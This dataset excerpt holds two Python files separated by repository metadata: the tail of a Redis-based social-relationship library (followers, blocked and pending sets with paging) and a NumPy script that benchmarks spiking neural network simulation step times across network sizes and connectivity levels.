scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
id),
page_options)
def blocked(self, id, page_options=None, scope=None):
'''
Retrieve a page of blocked individuals for a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of blocked individuals.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_key'],
scope,
id),
page_options)
def blocked_by(self, id, page_options=None, scope=None):
'''
Retrieve a page of individuals who have blocked a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of blocking individuals.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_by_key'],
scope,
id),
page_options)
def reciprocated(self, id, page_options=None, scope=None):
'''
Retrieve a page of individuals that have reciprocated a follow for a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of individuals that have reciprocated a follow.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
id),
page_options)
def pending(self, id, page_options=None, scope=None):
'''
Retrieve a page of pending relationships for a given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of pending relationships.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
id),
page_options)
def pending_with(self, id, page_options=None, scope=None):
'''
Retrieve a page of individuals that are waiting to approve the given ID.
@param id [String] ID of the individual.
@param page_options [Hash] Options to be passed for retrieving a page of pending relationships.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_options is None:
page_options = self.__default_paging_options()
return self.__members(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
id),
page_options)
def following_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of following relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['following_key'],
scope,
id),
page_size)
def followers_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of follower relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['followers_key'],
scope,
id),
page_size)
def blocked_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of blocked relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_key'],
scope,
id),
page_size)
def blocked_by_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of blocked_by relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['blocked_by_key'],
scope,
id),
page_size)
def reciprocated_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of reciprocated relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['reciprocated_key'],
scope,
id),
page_size)
def pending_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of pending relationships for an individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_key'],
scope,
id),
page_size)
def pending_with_page_count(self, id, page_size=None, scope=None):
'''
Count the number of pages of individuals waiting to approve another individual.
@param id [String] ID of the individual.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
if page_size is None:
page_size = self.DEFAULTS['page_size']
return self.__total_pages(
'%s:%s:%s:%s' %
(self.options['namespace'],
self.options['pending_with_key'],
scope,
id),
page_size)
def all(self, id, type, scope=None):
'''
Retrieve all of the individuals for a given id, type (e.g. following) and scope
@param id [String] ID of the individual.
@param type [String] One of 'following', 'followers', 'reciprocated', 'blocked', 'blocked_by', 'pending', 'pending_with'.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
self.__validate_relationship_type(type)
count = getattr(self, '%s_count' % type)(id, scope)
if count > 0:
return getattr(
self, '%s' %
type)(
id, {
'page_size': count, 'page': 1}, scope)
else:
return []
def count(self, id, type, scope=None):
'''
Retrieve a count of all of a given type of relationship for the specified id.
@param id [String] ID of the individual.
@param type [String] One of 'following', 'followers', 'reciprocated', 'blocked', 'blocked_by', 'pending', 'pending_with'.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
self.__validate_relationship_type(type)
return getattr(self, '%s_count' % type)(id, scope)
def page_count(self, id, type, page_size=None, scope=None):
'''
Retrieve a page count of a given type of relationship for the specified id.
@param id [String] ID of the individual.
@param type [String] One of 'following', 'followers', 'reciprocated', 'blocked', 'blocked_by', 'pending', 'pending_with'.
@param page_size [int] Page size (default: Amico.DEFAULTS['page_size']).
@param scope [String] Scope for the call.
'''
if page_size is None:
page_size = self.DEFAULTS['page_size']
if scope is None:
scope = self.options['default_scope_key']
self.__validate_relationship_type(type)
return getattr(self, '%s_page_count' % type)(id, page_size, scope)
# private methods
# Valid relationtionships that can be used in #all, #count, #page_count,
# etc...
VALID_RELATIONSHIPS = [
'following',
'followers',
'reciprocated',
'blocked',
'blocked_by',
'pending',
'pending_with']
def __validate_relationship_type(self, type):
'''
Ensure that a relationship type is valid.
@param type [String] One of 'following', 'followers', 'reciprocated', 'blocked', 'blocked_by', 'pending', 'pending_with'.
@raise [StandardError] if the type is not included in VALID_RELATIONSHIPS
'''
if type not in self.VALID_RELATIONSHIPS:
raise Exception('Invalid relationship type given %s' % type)
def __clear_bidirectional_sets_for_id(
self,
id,
source_set_key,
related_set_key,
scope=None):
'''
Removes references to an individual in sets that are named with other individual's keys.
Assumes two set keys that are used together such as followers/following, blocked/blocked_by, etc...
@param id [String] The ID of the individual to clear info for.
@param source_set_key [String] The key identifying the souce set to iterate over.
@param related_set_key [String] The key identifying the sets that the idividual needs to be removed from.
@param scope [String] Scope for the call.
'''
if scope is None:
scope = self.options['default_scope_key']
related_ids = self.redis_connection.zrange(
'%s:%s:%s:%s' %
(self.options['namespace'], source_set_key, scope, id), 0, -1)
transaction = self.redis_connection.pipeline()
for related_id in related_ids:
self.redis_connection.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'],
related_set_key,
scope,
related_id),
id)
transaction.execute()
self.redis_connection.delete(
'%s:%s:%s:%s' %
(self.options['namespace'], source_set_key, scope, id))
def __add_following_followers_reciprocated(
self,
from_id,
to_id,
scope=None):
'''
Add the following, followers and check for a reciprocated relationship. To be used from the
+follow+ and +accept+ methods.
@param from_id [String] The ID of the individual establishing the follow relationship.
@param to_id [String] The ID of the individual to be followed.
'''
if scope is None:
scope = self.options['default_scope_key']
transaction = self.redis_connection.pipeline()
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['following_key'], scope, from_id), int(
time.time()), to_id)
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['followers_key'], scope, to_id), int(
time.time()), from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['pending_key'], scope, to_id), int(
time.time()), from_id)
transaction.zrem(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['pending_with_key'], scope, from_id), int(
time.time()), to_id)
transaction.execute()
if self.is_reciprocated(from_id, to_id, scope):
transaction = self.redis_connection.pipeline()
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['reciprocated_key'], scope, from_id), int(
time.time()), to_id)
transaction.zadd(
'%s:%s:%s:%s' %
(self.options['namespace'], self.options['reciprocated_key'], scope, to_id), int(
time.time()), from_id)
transaction.execute()
def __total_pages(self, key, page_size):
'''
Count the total number of pages for a given key in a Redis sorted set.
@param key [String] Redis key.
@param page_size [int] Page size from which to calculate total pages.
@return total number of pages for a given key in a Redis sorted set.
'''
return int(
math.ceil(
self.redis_connection.zcard(key) /
float(page_size)))
def __default_paging_options(self):
'''
Default paging options.
@return a hash of the default paging options.
'''
default_options = {
'page_size': self.DEFAULTS['page_size'],
'page': 1
}
return default_options
def __members(self, key, options=None):
'''
Retrieve a page of items from a Redis sorted set without scores.
@param key [String] Redis key.
@param options [Hash] Default options for paging.
@return a page of items from a Redis sorted set without scores.
'''
if options is None:
options = self.__default_paging_options()
if options['page'] < 1:
options['page'] = 1
total_pages = self.__total_pages(key, options['page_size'])
if options['page'] > total_pages:
options['page'] = total_pages
index_for_redis = options['page'] - 1
starting_offset = (index_for_redis * options['page_size'])
if starting_offset < 0:
starting_offset = 0
ending_offset = (starting_offset + options['page_size']) - 1
return self.redis_connection.zrevrange(
key,
starting_offset,
ending_offset,
withscores=False)
| 34.156111 | 129 | 0.559403 | 4,489 | 38,289 | 4.611495 | 0.047672 | 0.016811 | 0.016811 | 0.011207 | 0.824308 | 0.797256 | 0.776146 | 0.753877 | 0.745326 | 0.728274 | 0 | 0.000828 | 0.337355 | 38,289 | 1,120 | 130 | 34.186607 | 0.815072 | 0.294993 | 0 | 0.791789 | 0 | 0 | 0.133406 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065982 | false | 0 | 0.004399 | 0 | 0.139296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e88585977c3075335ee08006773309d24964f611 | 22,157 | py | Python | benchmarking/thresholdVaryConnectivity/test_thresholds_varying_connectivity.py | wnourse05/SNS-Toolbox | 2fbb9332aadd6eb3a71f0519e69d7b0ad273b7b0 | [
"Apache-2.0"
] | null | null | null | benchmarking/thresholdVaryConnectivity/test_thresholds_varying_connectivity.py | wnourse05/SNS-Toolbox | 2fbb9332aadd6eb3a71f0519e69d7b0ad273b7b0 | [
"Apache-2.0"
] | null | null | null | benchmarking/thresholdVaryConnectivity/test_thresholds_varying_connectivity.py | wnourse05/SNS-Toolbox | 2fbb9332aadd6eb3a71f0519e69d7b0ad273b7b0 | [
"Apache-2.0"
] | null | null | null | """
Implement the Numpy backend, and collect timing information with different parameters
William Nourse
August 26th, 2021
I have set myself beyond the pale. I am nothing. I am hardly human anymore.
"""
import numpy as np
import pickle
import time
import sys
"""
########################################################################################################################
NETWORK STEP
Update all of the neural states for 1 timestep
"""
def stepAll(inputConnectivity, inputVals, Ulast, timeFactorMembrane, Gm, Ib, thetaLast, timeFactorThreshold, theta0, m, refCtr,
refPeriod, GmaxNon, GmaxSpk, Gspike, timeFactorSynapse, DelE, outputVoltageConnectivity,
outputSpikeConnectivity, R=20):
"""
All components are present
:param inputConnectivity: Matrix describing routing of input currents
:param inputVals: Value of input currents (nA)
:param Ulast: Vector of neural states at the previous timestep (mV)
:param timeFactorMembrane: Vector of constant parameters for each neuron (dt/Cm)
:param Gm: Vector of membrane conductances (uS)
:param Ib: Vector of bias currents (nA)
:param thetaLast: Firing threshold at the previous timestep (mV)
:param timeFactorThreshold: Vector of constant parameters for each neuron (dt/tauTheta)
:param theta0: Vector of initial firing thresholds (mV)
:param m: Vector of threshold adaptation ratios
:param refCtr: Vector to store remaining timesteps in the refractory period
:param refPeriod: Vector of refractory periods
:param GmaxNon: Matrix of maximum nonspiking synaptic conductances (uS)
:param GmaxSpk: Matrix of maximum spiking synaptic conductances (uS)
:param Gspike: Matrix of spiking synaptic conductances (uS)
:param timeFactorSynapse: Matrix of constant parameters for each synapse (dt/tau_syn)
:param DelE: Matrix of synaptic reversal potentials
:param outputVoltageConnectivity: Matrix describing routes to output nodes
:param outputSpikeConnectivity: Matrix describing routes to output nodes
:param R: Neural range (mV)
:return: u, u_last, theta_last, g_spike, refCtr, outputVoltages
"""
start = time.time()
Iapp = np.matmul(inputConnectivity,inputVals) # Apply external current sources to their destinations
Gnon = np.maximum(0, np.minimum(GmaxNon * Ulast/R, GmaxNon))
Gspike = Gspike * (1 - timeFactorSynapse)
Gsyn = Gnon + Gspike
Isyn = np.sum(Gsyn * DelE, axis=1) - Ulast * np.sum(Gsyn, axis=1)
U = Ulast + timeFactorMembrane * (-Gm * Ulast + Ib + Isyn + Iapp) # Update membrane potential
theta = thetaLast + timeFactorThreshold * (-thetaLast + theta0 + m * Ulast) # Update the firing thresholds
spikes = np.sign(np.minimum(0, theta + U * (-1 + refCtr))) # Compute which neurons have spiked
Gspike = np.maximum(Gspike, (-spikes) * GmaxSpk) # Update the conductance of connections which spiked
U = U * (spikes + 1) # Reset the membrane voltages of neurons which spiked
refCtr = np.maximum(0, refCtr - spikes * (refPeriod + 1) - 1) # Update refractory periods
outputVoltages = np.matmul(outputVoltageConnectivity, U) # Copy desired neural quantities to output nodes
outputSpikes = np.matmul(outputSpikeConnectivity, spikes) # Copy desired neural quantities to output nodes
Ulast = np.copy(U) # Copy the current membrane voltage to be the past value
thetaLast = np.copy(theta) # Copy the current threshold value to be the past value
end = time.time()
return U, Ulast, thetaLast, Gspike, refCtr, outputVoltages, outputSpikes, end-start
def stepNoRef(inputConnectivity, inputVals, Ulast, timeFactorMembrane, Gm, Ib, thetaLast, timeFactorThreshold, theta0, m, GmaxNon,
GmaxSpk, Gspike, timeFactorSynapse, DelE, outputVoltageConnectivity, outputSpikeConnectivity, R=20):
"""
There is no refractory period
:param inputConnectivity: Matrix describing routing of input currents
:param inputVals: Value of input currents (nA)
:param Ulast: Vector of neural states at the previous timestep (mV)
:param timeFactorMembrane: Vector of constant parameters for each neuron (dt/Cm)
:param Gm: Vector of membrane conductances (uS)
:param Ib: Vector of bias currents (nA)
:param thetaLast: Firing threshold at the previous timestep (mV)
:param timeFactorThreshold: Vector of constant parameters for each neuron (dt/tauTheta)
:param theta0: Vector of initial firing thresholds (mV)
:param m: Vector of threshold adaptation ratios
:param GmaxNon: Matrix of maximum nonspiking synaptic conductances (uS)
:param GmaxSpk: Matrix of maximum spiking synaptic conductances (uS)
:param Gspike: Matrix of spiking synaptic conductances (uS)
:param timeFactorSynapse: Matrix of constant parameters for each synapse (dt/tau_syn)
:param DelE: Matrix of synaptic reversal potentials
:param outputVoltageConnectivity: Matrix describing routes to output nodes
:param outputSpikeConnectivity: Matrix describing routes to output nodes
:param R: Range of neural activity (mV)
:return: u, u_last, theta_last, g_spike, outputVoltages, outputSpikes
"""
start = time.time()
Iapp = np.matmul(inputConnectivity,inputVals) # Apply external current sources to their destinations
Gnon = np.maximum(0, np.minimum(GmaxNon * Ulast/R, GmaxNon))
Gspike = Gspike * (1 - timeFactorSynapse)
Gsyn = Gnon + Gspike
Isyn = np.sum(Gsyn * DelE, axis=1) - Ulast * np.sum(Gsyn, axis=1)
U = Ulast + timeFactorMembrane * (-Gm * Ulast + Ib + Isyn + Iapp) # Update membrane potential
theta = thetaLast + timeFactorThreshold * (-thetaLast + theta0 + m * Ulast) # Update the firing thresholds
spikes = np.sign(np.minimum(0, theta - U)) # Compute which neurons have spiked
Gspike = np.maximum(Gspike, (-spikes) * GmaxSpk) # Update the conductance of connections which spiked
U = U * (spikes + 1) # Reset the membrane voltages of neurons which spiked
outputVoltages = np.matmul(outputVoltageConnectivity, U) # Copy desired neural quantities to output nodes
outputSpikes = np.matmul(outputSpikeConnectivity, spikes) # Copy desired neural quantities to output nodes
Ulast = np.copy(U) # Copy the current membrane voltage to be the past value
thetaLast = np.copy(theta) # Copy the current threshold value to be the past value
end = time.time()
return U, Ulast, thetaLast, Gspike, outputVoltages, outputSpikes, end - start
def stepNoSpike(inputConnectivity,inputVals,Ulast,timeFactorMembrane,Gm,Ib,GmaxNon,DelE,outputConnectivity,R=20):
"""
No neurons can be spiking
:param inputConnectivity: Matrix describing routing of input currents
:param inputVals: Value of input currents (nA)
:param Ulast: Vector of neural states at the previous timestep (mV)
:param timeFactorMembrane: Vector of constant parameters for each neuron (dt/Cm)
:param Gm: Vector of membrane conductances (uS)
:param Ib: Vector of bias currents (nA)
:param GmaxNon: Matrix of maximum nonspiking synaptic conductances (uS)
:param DelE: Matrix of synaptic reversal potentials
:param outputConnectivity: Matrix describing routes to output nodes
:param R: Range of neural activity (mV)
:return: u, u_last, outputNodes
"""
start = time.time()
Iapp = np.matmul(inputConnectivity,inputVals) # Apply external current sources to their destinations
Gsyn = np.maximum(0, np.minimum(GmaxNon * Ulast/R, GmaxNon))
Isyn = np.sum(Gsyn * DelE, axis=1) - Ulast * np.sum(Gsyn, axis=1)
U = Ulast + timeFactorMembrane * (-Gm * Ulast + Ib + Isyn + Iapp) # Update membrane potential
outputNodes = np.matmul(outputConnectivity,U) # Copy desired neural quantities to output nodes
Ulast = np.copy(U) # Copy the current membrane voltage to be the past value
end = time.time()
return U, Ulast, outputNodes,end-start
"""
########################################################################################################################
NETWORK CONSTRUCTION
Construct testing networks using specifications
"""
def constructAll(dt, numNeurons, probConn, perIn, perOut, perSpike, seed=0):
"""
All elements are present
:param dt: Simulation timestep (ms)
:param numNeurons: Number of neurons in the network
:param probConn: Percent of network which is connected
:param perIn: Percent of input nodes in the network
:param perOut: Percent of output nodes in the network
:param perSpike: Percent of neurons which are spiking
:param seed: Random seed
:return: All of the parameters required to run a network
"""
# Inputs
numInputs = int(perIn*numNeurons)
if numInputs == 0:
numInputs = 1
inputVals = np.zeros(numInputs)+1.0
inputConnectivity = np.zeros([numNeurons,numInputs]) + 1
# Construct neurons
Ulast = np.zeros(numNeurons)
numSpike = int(perSpike*numNeurons)
Cm = np.zeros(numNeurons) + 5.0 # membrane capacitance (nF)
Gm = np.zeros(numNeurons) + 1.0 # membrane conductance (uS)
Ib = np.zeros(numNeurons) + 10.0 # bias current (nA)
timeFactorMembrane = dt/Cm
# Threshold stuff
theta0 = np.zeros(numNeurons)
for i in range(numNeurons):
if i >= numSpike:
theta0[i] = sys.float_info.max
else:
theta0[i] = 1.0
thetaLast = np.copy(theta0)
m = np.zeros(numNeurons)
tauTheta = np.zeros(numNeurons)+1.0
timeFactorThreshold = dt/tauTheta
# Refractory period
refCtr = np.zeros(numNeurons)
refPeriod = np.zeros(numNeurons)+1
# Synapses
GmaxNon = np.zeros([numNeurons,numNeurons])
GmaxSpk = np.zeros([numNeurons,numNeurons])
Gspike = np.zeros([numNeurons,numNeurons])
DelE = np.zeros([numNeurons,numNeurons])
tauSyn = np.zeros([numNeurons, numNeurons])+1
np.random.seed(seed)
for row in range(numNeurons):
for col in range(numNeurons):
rand = np.random.uniform()
if rand < probConn:
DelE[row][col] = 100
if theta0[col] < sys.float_info.max:
GmaxSpk[row][col] = 1
else:
GmaxNon[row][col] = 1
tauSyn[row][col] = 2
timeFactorSynapse = dt/tauSyn
# Outputs
numOutputs = int(perOut*numNeurons)
if numOutputs == 0:
numOutputs = 1
outputVoltageConnectivity = np.zeros([numOutputs,numNeurons])
for i in range(numOutputs):
outputVoltageConnectivity[i][i] = 1
outputSpikeConnectivity = np.copy(outputVoltageConnectivity)
return (inputConnectivity,inputVals,Ulast,timeFactorMembrane,Gm,Ib,thetaLast,timeFactorThreshold,theta0,m,refCtr,
refPeriod,GmaxNon,GmaxSpk,Gspike,timeFactorSynapse,DelE,outputVoltageConnectivity,outputSpikeConnectivity)
def constructNoRef(dt,numNeurons,perConn,perIn,perOut,perSpike,seed=0):
"""
No refractory period
:param dt: Simulation timestep (ms)
:param numNeurons: Number of neurons in the network
:param perConn: Percent of network which is connected
:param perIn: Percent of input nodes in the network
:param perOut: Percent of output nodes in the network
:param perSpike: Percent of neurons which are spiking
:param seed: Random seed
:return: All of the parameters required to run a network
"""
# Inputs
numInputs = int(perIn*numNeurons)
inputVals = np.zeros(numInputs)+1.0
inputConnectivity = np.zeros([numNeurons,numInputs]) + 1
# Construct neurons
Ulast = np.zeros(numNeurons)
numSpike = int(perSpike*numNeurons)
Cm = np.zeros(numNeurons) + 5.0 # membrane capacitance (nF)
Gm = np.zeros(numNeurons) + 1.0 # membrane conductance (uS)
Ib = np.zeros(numNeurons) + 10.0 # bias current (nA)
timeFactorMembrane = dt/Cm
# Threshold stuff
theta0 = np.zeros(numNeurons)
for i in range(numNeurons):
if i >= numSpike:
theta0[i] = sys.float_info.max
else:
theta0[i] = 1.0
thetaLast = np.copy(theta0)
m = np.zeros(numNeurons)
tauTheta = np.zeros(numNeurons)+1.0
timeFactorThreshold = dt/tauTheta
# Synapses
GmaxNon = np.zeros([numNeurons,numNeurons])
GmaxSpk = np.zeros([numNeurons,numNeurons])
Gspike = np.zeros([numNeurons,numNeurons])
DelE = np.zeros([numNeurons,numNeurons])
tauSyn = np.zeros([numNeurons, numNeurons])+1
numSyn = int(perConn*numNeurons*numNeurons)
np.random.seed(seed)
for row in range(numNeurons):
for col in range(numNeurons):
rand = np.random.uniform()
if rand < probConn:
DelE[row][col] = 100
if theta0[col] < sys.float_info.max:
GmaxSpk[row][col] = 1
else:
GmaxNon[row][col] = 1
tauSyn[row][col] = 2
timeFactorSynapse = dt/tauSyn
# Outputs
numOutputs = int(perOut*numNeurons)
outputVoltageConnectivity = np.zeros([numOutputs, numNeurons])
for i in range(numOutputs):
outputVoltageConnectivity[i][i] = 1
outputSpikeConnectivity = np.copy(outputVoltageConnectivity)
return (inputConnectivity, inputVals, Ulast, timeFactorMembrane, Gm, Ib, thetaLast, timeFactorThreshold, theta0, m,
GmaxNon, GmaxSpk, Gspike, timeFactorSynapse, DelE, outputVoltageConnectivity, outputSpikeConnectivity)
def constructNoSpike(dt,numNeurons,perConn,perIn,perOut,seed=0):
"""
No spiking elements
:param dt: Simulation timestep (ms)
:param numNeurons: Number of neurons in the network
:param perConn: Percent of network which is connected
:param perIn: Percent of input nodes in the network
:param perOut: Percent of output nodes in the network
:param seed: Random seed
:return: All of the parameters required to run a network
"""
# Inputs
numInputs = int(perIn*numNeurons)
inputVals = np.zeros(numInputs)+1.0
inputConnectivity = np.zeros([numNeurons,numInputs]) + 1
# Construct neurons
Ulast = np.zeros(numNeurons)
Cm = np.zeros(numNeurons) + 5.0 # membrane capacitance (nF)
Gm = np.zeros(numNeurons) + 1.0 # membrane conductance (uS)
Ib = np.zeros(numNeurons) + 10.0 # bias current (nA)
timeFactorMembrane = dt/Cm
# Synapses
GmaxNon = np.zeros([numNeurons,numNeurons])
DelE = np.zeros([numNeurons,numNeurons])
numSyn = int(perConn*numNeurons*numNeurons)
k = 0
usedIndex = []
np.random.seed(seed)
for row in range(numNeurons):
for col in range(numNeurons):
rand = np.random.uniform()
if rand < probConn:
DelE[row][col] = 100
GmaxNon[row][col] = 1
# Outputs
numOutputs = int(perOut*numNeurons)
outputConnectivity = np.zeros([numOutputs,numNeurons])
for i in range(numOutputs):
outputConnectivity[i][i] = 1
return inputConnectivity,inputVals,Ulast,timeFactorMembrane,Gm,Ib,GmaxNon,DelE,outputConnectivity
"""
########################################################################################################################
TESTING
"""
# All components:
# Testing parameters
dt = 0.001
perIn = 0.08
perOut = 0.12
numSizeSamples = 100
numSpikeSamples = 1
numConnSamples = 10
numSteps = 1000
networkSize = np.logspace(1,4,num=numSizeSamples)
# percentSpiking = np.linspace(0.0,1.0,num=numSpikeSamples)
percentSpiking = [0]
probConnectivity = np.logspace(0, 1, num=numConnSamples) / 10
start = time.time()
# parameters = {'networkSize': networkSize,
# 'probConnectivity': probConnectivity}
#
# # Testing data (no spike)
# timeData = np.zeros([numSizeSamples,numConnSamples,numSteps])
# data = {'dim1': 'networkSize',
# 'dim2': 'probConnectivity'}
# # Collection loop (no spike)
# for size in range(numSizeSamples):
# for probConn in range(numConnSamples):
# print('No Spike: Size %d/%d, Percent Spiking 0/0, Percent Connectivity %d/%d' % ((size+1), numSizeSamples, (probConn + 1), numConnSamples))
# print('Running for %f seconds' % (time.time() - start))
# (input_connectivity,inputVals,u_last,time_factor_membrane,g_m,i_b,
# g_max_non,del_e,outputConnectivity) = constructNoSpike(dt, int(networkSize[size]),probConnectivity[probConn],perIn,perOut)
# tStep = np.zeros(numSteps)
# for step in range(numSteps):
# # print(' %d'%step)
# (_,u_last,_,tStep[step]) = stepNoSpike(input_connectivity,inputVals,u_last,
# time_factor_membrane,g_m,i_b,g_max_non,del_e,outputConnectivity)
# timeData[size][probConn][:] = tStep
#
# data['data'] = timeData
# numpyNoSpikeTest = {'params': parameters,'data': data}
# pickle.dump(numpyNoSpikeTest, open('dataNumpyNoSpike.p','wb'))
parameters = {'networkSize': networkSize,
'percentSpiking': percentSpiking,
'probConnectivity': probConnectivity}
# Testing data (no ref)
timeData = np.zeros([numSizeSamples,numSpikeSamples,numConnSamples,numSteps])
data = {'dim1': 'networkSize',
'dim2': 'percentSpiking',
'dim3': 'probConnectivity'}
# Collection loop (no ref)
for size in range(numSizeSamples):
for perSpike in range(numSpikeSamples):
for probConn in range(numConnSamples):
print('No Ref: Size %d/%d, Percent Spiking %d/%d, Percent Connectivity %d/%d' % ((size+1), numSizeSamples, (perSpike+1), numSpikeSamples, (probConn + 1), numSizeSamples))
print('Running for %f seconds' % (time.time() - start))
(inputConnectivity,inputVals,Ulast,timeFactorMembrane,Gm,Ib,thetaLast, timeFactorThreshold, theta0, m,
GmaxNon,GmaxSpk,
Gspike,timeFactorSynapse,DelE,
outputVoltageConnectivity,outputSpikeConnectivity) = constructNoRef(dt, int(networkSize[size]),
probConnectivity[probConn], perIn,
perOut,percentSpiking[perSpike])
tStep = np.zeros(numSteps)
for step in range(numSteps):
# print(' %d'%step)
(_,Ulast,thetaLast,Gspike,_,_,tStep[step]) = stepNoRef(inputConnectivity,inputVals,Ulast,
timeFactorMembrane,Gm,Ib,thetaLast,
timeFactorThreshold,theta0,m,GmaxNon,GmaxSpk,
Gspike,timeFactorSynapse,DelE,outputVoltageConnectivity,outputSpikeConnectivity)
timeData[size][perSpike][probConn][:] = tStep
data['data'] = timeData
numpyNoRefTest = {'params': parameters,'data': data}
pickle.dump(numpyNoRefTest, open('dataNumpyNoRef.p','wb'))
parameters = {'networkSize': networkSize,
'percentSpiking': percentSpiking,
'probConnectivity': probConnectivity}
# Testing data (all)
timeData = np.zeros([numSizeSamples,numSpikeSamples,numConnSamples,numSteps])
data = {'dim1': 'networkSize',
'dim2': 'percentSpiking',
'dim3': 'probConnectivity'}
# Collection loop (all)
for size in range(numSizeSamples):
for perSpike in range(numSpikeSamples):
for probConn in range(numConnSamples):
print('All: Size %d/%d, Percent Spiking %d/%d, Percent Connectivity %d/%d' % ((size+1), numSizeSamples, (perSpike+1), numSpikeSamples, (probConn + 1), numConnSamples))
print('Running for %f seconds'%(time.time()-start))
(inputConnectivity,inputVals,Ulast,timeFactorMembrane,Gm,Ib,thetaLast, timeFactorThreshold, theta0, m,
refCtr,refPeriod,GmaxNon,GmaxSpk,
Gspike,timeFactorSynapse,DelE,outputVoltageConnectivity,outputSpikeConnectivity) = constructAll(dt, int(networkSize[size]),
probConnectivity[probConn], perIn, perOut,
percentSpiking[perSpike])
tStep = np.zeros(numSteps)
for step in range(numSteps):
# print(' %d'%step)
(_,Ulast,thetaLast,Gspike,refCtr,_,_,tStep[step]) = stepAll(inputConnectivity,inputVals,Ulast,
timeFactorMembrane,Gm,Ib,thetaLast,
timeFactorThreshold,theta0,m,refCtr,
refPeriod,GmaxNon,GmaxSpk,Gspike,
timeFactorSynapse,DelE,
outputVoltageConnectivity,outputSpikeConnectivity)
timeData[size][perSpike][probConn][:] = tStep
data['data'] = timeData
numpyAllTest = {'params': parameters,'data': data}
pickle.dump(numpyAllTest, open('dataNumpyAll.p','wb'))
